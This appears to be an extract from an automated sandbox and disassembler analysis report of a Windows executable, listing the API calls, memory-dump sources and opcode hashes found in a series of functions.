                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                    • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                    • Opcode Fuzzy Hash: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                    • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                    • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                    • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                    • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                    APIs
                    • GetCursorPos.USER32(?), ref: 00402357
                    • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                    • GetAsyncKeyState.USER32(00000001), ref: 00402399
                    • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                    • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                    • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                    • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                    • TranslateMessage.USER32(?), ref: 0045645C
                    • DispatchMessageW.USER32(?), ref: 00456466
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                    • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                    • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                    • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00458A30
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                    • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                    • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                    • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                    APIs
                    • IsWindowVisible.USER32(?), ref: 0045B204
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                    • _wcsstr.LIBCMT ref: 0045B289
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                    • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                    • Opcode Fuzzy Hash: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                    • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                    • __itow.LIBCMT ref: 0045936A
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                    • __itow.LIBCMT ref: 004593A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                    • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                    • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                    • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                    • SelectObject.GDI32(?,00000000), ref: 0040135C
                    • BeginPath.GDI32(?), ref: 00401373
                    • SelectObject.GDI32(?,00000000), ref: 0040139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                    • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                    • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                    • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                    • __beginthreadex.LIBCMT ref: 00464AD8
                    • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                    • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                    • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                    • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                    • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                    • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                    • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                    • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                    • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                    • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                    • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                    • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                    • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                    • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                    • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                    • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                    • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                    • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                    • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                    • MessageBeep.USER32(00000000), ref: 0045C226
                    • KillTimer.USER32(?,0000040A), ref: 0045C242
                    • EndDialog.USER32(?,00000001), ref: 0045C25C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                    • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                    • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                    • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                    APIs
                    • EndPath.GDI32(?), ref: 004013BF
                    • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                    • SelectObject.GDI32(?,00000000), ref: 004013EE
                    • DeleteObject.GDI32 ref: 00401401
                    • StrokePath.GDI32(?), ref: 0040141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                    • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                    • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                    • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                    • __swprintf.LIBCMT ref: 00412ECD
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
